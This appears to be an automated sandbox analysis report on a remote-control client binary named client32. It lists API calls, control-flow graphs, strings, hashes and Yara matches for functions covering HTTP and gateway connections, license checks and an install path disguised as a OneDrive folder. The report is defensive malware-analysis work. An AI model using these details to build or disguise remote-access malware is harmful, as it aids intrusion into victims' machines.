                                                        • SetLastError.KERNEL32(00000078), ref: 110283E3
                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11028409
                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102845D
                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110285C3
                                                        • SetLastError.KERNEL32(00000078), ref: 11028690
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110286E2
                                                        • SetLastError.KERNEL32(00000078), ref: 110286F9
                                                        • FreeLibrary.KERNEL32(?), ref: 1102870A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                        • API String ID: 921868004-913974648
                                                        • Opcode ID: 38a177254a395bd81f3ba5e7078fbe7383a886fa9f6ba65ffc089b6185ad6f7b
                                                        • Instruction ID: 1ba2d1776f027d8e66b5c2b51482412bc640081c7f076ce1c4d8da5fffc402e2
                                                        • Opcode Fuzzy Hash: 38a177254a395bd81f3ba5e7078fbe7383a886fa9f6ba65ffc089b6185ad6f7b
                                                        • Instruction Fuzzy Hash: AD1280B9D406299FDB12CFA5CC88A9EFBF4EF89304F64855AF416B7244DB705A40CB60
                                                        Function 6C815690 Relevance: 82.6, APIs: 19, Strings: 28, Instructions: 352threadlibrarynetworkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 945 6c815690-6c8156b0 call 6c802a90 call 6c81c240 950 6c8156b2-6c8156f5 LoadLibraryA 945->950 951 6c8156f7 945->951 952 6c8156f9-6c815758 call 6c807640 InitializeCriticalSection CreateEventA 950->952 951->952 955 6c815771-6c81577e CreateEventA 952->955 956 6c81575a-6c81576e call 6c805910 952->956 957 6c815780-6c815794 call 6c805910 955->957 958 6c815797-6c8157a4 CreateEventA 955->958 956->955 957->958 961 6c8157a6-6c8157ba call 6c805910 958->961 962 6c8157bd-6c8157d0 WSAStartup 958->962 961->962 966 6c8157e3-6c81581c call 6c81f8cb 962->966 967 6c8157d2-6c8157e2 call 6c803d90 call 6c802b70 962->967 973 6c81583a-6c81585b call 6c81f9b0 call 6c818210 966->973 974 6c81581e-6c815837 call 6c805910 966->974 983 6c81585d-6c815862 973->983 984 6c81586e-6c815876 call 6c8041f0 973->984 974->973 985 6c815864-6c81586c 983->985 988 6c815910-6c815915 984->988 989 6c81587c-6c81589f call 6c81f8cb 984->989 985->984 985->985 990 6c815923-6c81593b call 6c804950 call 6c804020 988->990 991 6c815917-6c81591a 988->991 996 6c8158a1-6c8158c0 call 6c805910 989->996 997 6c8158c3-6c8158e1 call 6c81f9b0 call 6c81f8cb 989->997 998 6c81593e-6c815959 call 6c804950 990->998 991->990 993 6c81591c-6c815921 991->993 993->990 993->998 996->997 1016 6c8158e3-6c8158fc call 6c805910 997->1016 1017 6c8158ff-6c81590d call 6c81f9b0 997->1017 1009 6c815966-6c815990 GetTickCount CreateThread 998->1009 1010 6c81595b-6c815961 998->1010 1012 6c815992-6c8159ab call 6c805910 1009->1012 1013 6c8159ae-6c8159bb SetThreadPriority 1009->1013 1010->1009 1012->1013 1014 6c8159d4-6c815a00 call 6c8049e0 GetModuleFileNameA call 6c802420 1013->1014 1015 6c8159bd-6c8159d1 call 6c805910 1013->1015 1030 6c815a02-6c815a03 1014->1030 1031 6c815a05 1014->1031 1015->1014 1016->1017 1017->988 1032 6c815a0a-6c815a26 1030->1032 1031->1032 1033 6c815a30-6c815a3f 1032->1033 1033->1033 1034 6c815a41-6c815a46 1033->1034 1035 6c815a47-6c815a4d 1034->1035 1035->1035 1036 6c815a4f-6c815a88 GetPrivateProfileIntA GetModuleHandleA 1035->1036 1037 6c815b23-6c815b47 CreateMutexA 1036->1037 1038 6c815a8e-6c815aba call 6c804950 * 2 1036->1038 1043 6c815af6-6c815b1d call 6c804950 * 2 1038->1043 1044 6c815abc-6c815ad1 call 6c804950 1038->1044 1043->1037 1050 6c815ad3-6c815ae8 call 6c804950 1044->1050 1051 6c815aea-6c815af0 1044->1051 1050->1043 1050->1051 1051->1043
                                                        APIs
                                                          • Part of subcall function 6C802A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C802ACB
                                                          • Part of subcall function 6C802A90: _strrchr.LIBCMT ref: 6C802ADA
                                                          • Part of subcall function 6C802A90: _strrchr.LIBCMT ref: 6C802AEA
                                                          • Part of subcall function 6C802A90: wsprintfA.USER32 ref: 6C802B05
                                                          • Part of subcall function 6C81C240: _malloc.LIBCMT ref: 6C81C259
                                                          • Part of subcall function 6C81C240: wsprintfA.USER32 ref: 6C81C274
                                                          • Part of subcall function 6C81C240: _memset.LIBCMT ref: 6C81C297
                                                        • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C8156B7
                                                        • InitializeCriticalSection.KERNEL32(6C849898), ref: 6C81573F
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C81574F
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C815775
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C81579B
                                                        • WSAStartup.WSOCK32(00000101,6C84991A), ref: 6C8157C7
                                                        • _malloc.LIBCMT ref: 6C81580D
                                                          • Part of subcall function 6C81F8CB: __FF_MSGBANNER.LIBCMT ref: 6C81F8E4
                                                          • Part of subcall function 6C81F8CB: __NMSG_WRITE.LIBCMT ref: 6C81F8EB
                                                          • Part of subcall function 6C81F8CB: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C82B131,6C824BF1,00000001,6C824BF1,?,6C82D1B5,00000018,6C845558,0000000C,6C82D245), ref: 6C81F910
                                                        • _memset.LIBCMT ref: 6C81583D
                                                        • _malloc.LIBCMT ref: 6C815890
                                                        • _memset.LIBCMT ref: 6C8158C6
                                                        • _malloc.LIBCMT ref: 6C8158D2
                                                        • _memset.LIBCMT ref: 6C815908
                                                        • GetTickCount.KERNEL32 ref: 6C815966
                                                        • CreateThread.KERNEL32(00000000,00004000,6C8151C0,00000000,00000000,6C849ACC), ref: 6C815983
                                                        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C8159B1
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\MSOneDrive\Support\,00000104), ref: 6C8159E9
                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini), ref: 6C815A70
                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C815A80
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Create_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocCountCriticalHandleHeapInitializeLibraryLoadPriorityPrivateProfileSectionStartupTick
                                                        • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$494126$C:\Users\user\AppData\Local\MSOneDrive\Support\$C:\Users\user\AppData\Local\MSOneDrive\Support\pci.ini$General$HTCTL32$NSM896597$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                        • API String ID: 2307927588-2221551840
                                                        • Opcode ID: 224b16f7efe33b63dd8a3428c66734efb69ce5eab33c82998ce6e72c1b02ba97
                                                        • Instruction ID: 31072543742ccb413c06cf495012aaf97e27ba3762d6a6d407434ae101f2cabc
                                                        • Opcode Fuzzy Hash: 224b16f7efe33b63dd8a3428c66734efb69ce5eab33c82998ce6e72c1b02ba97
                                                        • Instruction Fuzzy Hash: 0FC1A4B1A44319AFE730AF69AF859577BF8A71530CB148D39E44997F02D730A844CBE1
                                                        Function 1110E3D0 Relevance: 79.4, APIs: 23, Strings: 22, Instructions: 634COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemMetrics.USER32(0000004C), ref: 1110E422
                                                        • SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1110E438
                                                        • SystemParametersInfoA.USER32(00000026,00000000,03060800,00000000), ref: 1110E44A
                                                        • SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1110E4A0
                                                        • SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1110E4B5
                                                        • SystemParametersInfoA.USER32(00001002,00000000,03060810,00000000), ref: 1110E519
                                                        • SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1110E55F
                                                        • SystemParametersInfoA.USER32(00001004,00000000,03060808,00000000), ref: 1110E577
                                                        • SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1110E5BD
                                                        • SystemParametersInfoA.USER32(00001006,00000000,0306080C,00000000), ref: 1110E5D5
                                                        • SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1110E61B
                                                        • SystemParametersInfoA.USER32(0000101A,00000000,03060814,00000000), ref: 1110E633
                                                        • SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1110E679
                                                        • SystemParametersInfoA.USER32(00001014,00000000,03060818,00000000), ref: 1110E691
                                                        • SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1110E6D7
                                                        • SystemParametersInfoA.USER32(00001016,00000000,0306081C,00000000), ref: 1110E6EF
                                                        • SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1110E735
                                                        • SystemParametersInfoA.USER32(00001024,00000000,03060820,00000000), ref: 1110E74D
                                                        • SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1110E7FF
                                                        • SystemParametersInfoA.USER32(00001008,00000000,03060828,00000000), ref: 1110E817
                                                        • SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1110E85A
                                                        • SystemParametersInfoA.USER32(0000004A,00000000,0306082C,00000000), ref: 1110E86F
                                                        • SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1110E501
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: System$InfoParameters$Metrics__wcstoi64
                                                        • String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
                                                        • API String ID: 3799663137-3751266815
                                                        • Opcode ID: e7a4dce61e0f6dc888a7ab4a6d4f103cf71d0abfd572eaa5a0d6346dd09f0406
                                                        • Instruction ID: 9f95c093d5af311da67ec9eb410866abb6d77f64e7d878690f97347aefdc1e61
                                                        • Opcode Fuzzy Hash: e7a4dce61e0f6dc888a7ab4a6d4f103cf71d0abfd572eaa5a0d6346dd09f0406
                                                        • Instruction Fuzzy Hash: 0D12C434A02B56BAF7208B67CE44FABFBA5ABC4B44F51441CF546AA1C0EBB4F580C754
                                                        Function 1105D550 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11134260: GetLastError.KERNEL32(?,00000000,75A3795C,00000000), ref: 11134295
                                                          • Part of subcall function 11134260: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A3795C,00000000), ref: 111342A5
                                                        • _fgets.LIBCMT ref: 1105D682
                                                        • _strpbrk.LIBCMT ref: 1105D6E9
                                                        • _fgets.LIBCMT ref: 1105D7EC
                                                        • _strpbrk.LIBCMT ref: 1105D863
                                                        • __wcstoui64.LIBCMT ref: 1105D87C
                                                        • _fgets.LIBCMT ref: 1105D8F5
                                                        • _strpbrk.LIBCMT ref: 1105D91B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                        • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                        • API String ID: 716802716-1571441106
                                                        • Opcode ID: f5eea2a609ae30e24c7521b51ab016292f72383e495257dbf3964fe323c1f7db
                                                        • Instruction ID: 4e0492978d8d4243d04b01263315b5fbbceebc438647a9249f86b1f3f6260675
                                                        • Opcode Fuzzy Hash: f5eea2a609ae30e24c7521b51ab016292f72383e495257dbf3964fe323c1f7db
                                                        • Instruction Fuzzy Hash: CAA2D475E006569FEB90DB64DC80BEFB7B5AF45305F0081D9E849A7280EB70AE85CF61
                                                        Function 6C8090A0 Relevance: 51.1, APIs: 25, Strings: 4, Instructions: 338networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2238 6c8090a0-6c8090ee call 6c8042f0 2241 6c8090f0-6c8090fd EnterCriticalSection 2238->2241 2242 6c809133-6c80913a 2238->2242 2243 6c809102-6c80910e 2241->2243 2244 6c809177-6c80917b 2242->2244 2245 6c80913c-6c809151 call 6c820641 2242->2245 2246 6c809110-6c809114 2243->2246 2247 6c80911b-6c809126 2243->2247 2249 6c8091ea-6c8091fa socket 2244->2249 2250 6c80917d-6c809185 2244->2250 2246->2247 2252 6c809116-6c809119 2246->2252 2247->2243 2253 6c809128-6c80912d LeaveCriticalSection 2247->2253 2254 6c809212-6c80925f #21 * 2 call 6c804950 2249->2254 2255 6c8091fc-6c809211 WSAGetLastError call 6c820641 2249->2255 2250->2249 2251 6c809187-6c80918a 2250->2251 2251->2249 2257 6c80918c-6c8091a7 call 6c808ce0 2251->2257 2252->2247 2258 6c809152-6c809176 LeaveCriticalSection call 6c820641 2252->2258 2253->2242 2265 6c809261-6c809273 #21 2254->2265 2266 6c809278-6c80929d bind 2254->2266 2271 6c8093ac 2257->2271 2272 6c8091ad-6c8091d1 WSAGetLastError call 6c8030a0 2257->2272 2265->2266 2269 6c8092bf-6c8092c4 2266->2269 2270 6c80929f-6c8092be WSAGetLastError closesocket call 6c820641 2266->2270 2275 6c8092d1-6c8092d6 2269->2275 2276 6c8092c6-6c8092cf 2269->2276 2277 6c8093af-6c8093cb EnterCriticalSection 2271->2277 2284 6c8091d7-6c8091e9 call 6c820641 2272->2284 2285 6c80945a-6c80946a call 6c820641 2272->2285 2282 6c8092d7-6c8092ef htons WSASetBlockingHook call 6c805fc0 2275->2282 2276->2282 2278 6c809428-6c809458 LeaveCriticalSection GetTickCount InterlockedExchange 2277->2278 2279 6c8093cd-6c8093da 2277->2279 2278->2285 2283 6c8093e0-6c8093e6 2279->2283 2291 6c8092f4-6c8092f9 2282->2291 2287 6c8093f7-6c809425 2283->2287 2288 6c8093e8-6c8093f3 2283->2288 2287->2278 2288->2283 2292 6c8093f5 2288->2292 2295 6c809332-6c809336 2291->2295 2296 6c8092fb-6c809331 WSAGetLastError WSAUnhookBlockingHook closesocket call 6c8030a0 call 6c820641 2291->2296 2292->2278 2297 6c8093a5-6c8093aa WSAUnhookBlockingHook 2295->2297 2298 6c809338-6c80933c 2295->2298 2297->2277 2298->2297 2300 6c80933e-6c809358 call 6c808ce0 2298->2300 2306 6c8093a2 2300->2306 2307 6c80935a-6c809389 WSAGetLastError WSAUnhookBlockingHook closesocket call 6c8030a0 2300->2307 2306->2297 2307->2285 2310 6c80938f-6c8093a1 call 6c820641 2307->2310
                                                        APIs
                                                          • Part of subcall function 6C8042F0: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C8078D1,00000000,00000000,6C8498DA,?,00000080), ref: 6C804302
                                                        • EnterCriticalSection.KERNEL32(6C849898,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000,?,000001BB,FFFFFFFF,?), ref: 6C8090F5
                                                        • LeaveCriticalSection.KERNEL32(6C849898,?,?,?,?,?,?,6C811D39,00002000,?,000001BB,FFFFFFFF,?,?,00000000,?), ref: 6C80912D
                                                        • LeaveCriticalSection.KERNEL32(6C849898,?,?,?,?,?,?,6C811D39,00002000,?,000001BB,FFFFFFFF,?,?,00000000,?), ref: 6C809159
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000), ref: 6C8091AD
                                                        • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000), ref: 6C8091F0
                                                        • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000,?,?,?,?,?,?,6C811D39,00002000), ref: 6C8091FC
                                                        • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C80922A
                                                        • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809247
                                                        • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809273
                                                        • bind.WSOCK32(00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809296
                                                        • WSAGetLastError.WSOCK32(00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C80929F
                                                        • closesocket.WSOCK32(00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092A7
                                                        • htons.WSOCK32(00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092D7
                                                        • WSASetBlockingHook.WSOCK32(6C804E60,00000000,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092E5
                                                        • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8092FB
                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809302
                                                        • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809308
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C80935A
                                                        • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809361
                                                        • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C809367
                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8093A5
                                                        • EnterCriticalSection.KERNEL32(6C849898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C8093B4
                                                        • LeaveCriticalSection.KERNEL32(6C849898), ref: 6C809438
                                                        • GetTickCount.KERNEL32 ref: 6C809444
                                                        • InterlockedExchange.KERNEL32(6C811CC9,00000000), ref: 6C809452
                                                          • Part of subcall function 6C808CE0: wsprintfA.USER32 ref: 6C808D37
                                                          • Part of subcall function 6C808CE0: inet_ntoa.WSOCK32(00000000), ref: 6C808D43
                                                          • Part of subcall function 6C808CE0: _sprintf.LIBCMT ref: 6C808D7D
                                                          • Part of subcall function 6C808CE0: _free.LIBCMT ref: 6C808D83
                                                          • Part of subcall function 6C808CE0: GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6C808DCC
                                                          • Part of subcall function 6C808CE0: WSAGetLastError.WSOCK32 ref: 6C808DF0
                                                        Strings
                                                        • Connect error to %s using hijacked socket, error %d, xrefs: 6C8091B9
                                                        • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C809371
                                                        • Cannot connect to gateway %s, error %d, xrefs: 6C809312
                                                        • *TcpNoDelay, xrefs: 6C80924E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CriticalSection$BlockingHook$LeaveUnhookclosesocket$Enterinet_ntoa$AddressCountExchangeInterlockedProcTick_free_sprintfbindhtonssocketwsprintf
                                                        • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                        • API String ID: 1690749424-2561115898
                                                        • Opcode ID: 19bad86ffa116f219e6fb621aacd8d7c27355f0d39513604b49dcf63d91ba6ad
                                                        • Instruction ID: e64b14dea120e3bfee8ab51891098bae78e3847e0530e18c7df656390e1e35df
                                                        • Opcode Fuzzy Hash: 19bad86ffa116f219e6fb621aacd8d7c27355f0d39513604b49dcf63d91ba6ad
                                                        • Instruction Fuzzy Hash: EEB1D471B01108AFDB24DF98DE81BDDB7B5EF89318F104979E809ABB80DB749945CB90
                                                        Function 11129D80 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 380windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2598 11129d80-11129db5 2599 11129db7 call 11027e90 2598->2599 2600 11129dbc-11129dd8 call 111251e0 call 11124cc0 2598->2600 2599->2600 2606 11129eb7-11129ebe 2600->2606 2607 11129dde-11129de4 2600->2607 2610 11129f76-11129f8a 2606->2610 2611 11129ec4-11129ecb 2606->2611 2608 1112a2e4-1112a2ff call 11150781 2607->2608 2609 11129dea-11129e4b call 11129920 IsWindow IsWindowVisible call 111356e0 call 11059580 IsWindowVisible 2607->2609 2645 11129ead 2609->2645 2646 11129e4d-11129e53 2609->2646 2621 11129f90-11129f97 2610->2621 2622 1112a0c9 2610->2622 2611->2610 2613 11129ed1-11129ed8 2611->2613 2613->2610 2616 11129ede-11129eed FindWindowA 2613->2616 2616->2610 2620 11129ef3-11129ef8 IsWindowVisible 2616->2620 2620->2610 2624 11129efa-11129f01 2620->2624 2625 11129fa8-11129fc8 call 11059580 2621->2625 2626 11129f99-11129fa3 2621->2626 2627 1112a0cb-1112a0dc 2622->2627 2628 1112a10f-1112a117 2622->2628 2624->2610 2632 11129f03-11129f28 call 11129920 IsWindowVisible 2624->2632 2625->2628 2642 11129fce-11129ffd 2625->2642 2626->2628 2634 1112a0f4-1112a109 2627->2634 2635 1112a0de-1112a0ee 2627->2635 2629 1112a119-1112a139 call 11059580 2628->2629 2630 1112a14f-1112a155 2628->2630 2653 1112a13b-1112a147 call 1102b9a0 2629->2653 2654 1112a149 2629->2654 2638 1112a166-1112a16e 2630->2638 2639 1112a157-1112a163 call 11129920 2630->2639 2632->2610 2657 11129f2a-11129f39 IsIconic 2632->2657 2634->2628 2635->2634 2649 1112a180 2638->2649 2650 1112a170-1112a17b call 11066c70 2638->2650 2639->2638 2664 1112a018-1112a02b call 11132680 2642->2664 2665 11129fff-1112a013 call 1107c3b0 2642->2665 2645->2606 2646->2645 2655 11129e55-11129e6c call 111356e0 GetForegroundWindow 2646->2655 2652 1112a180 call 1111e690 2649->2652 2650->2649 2660 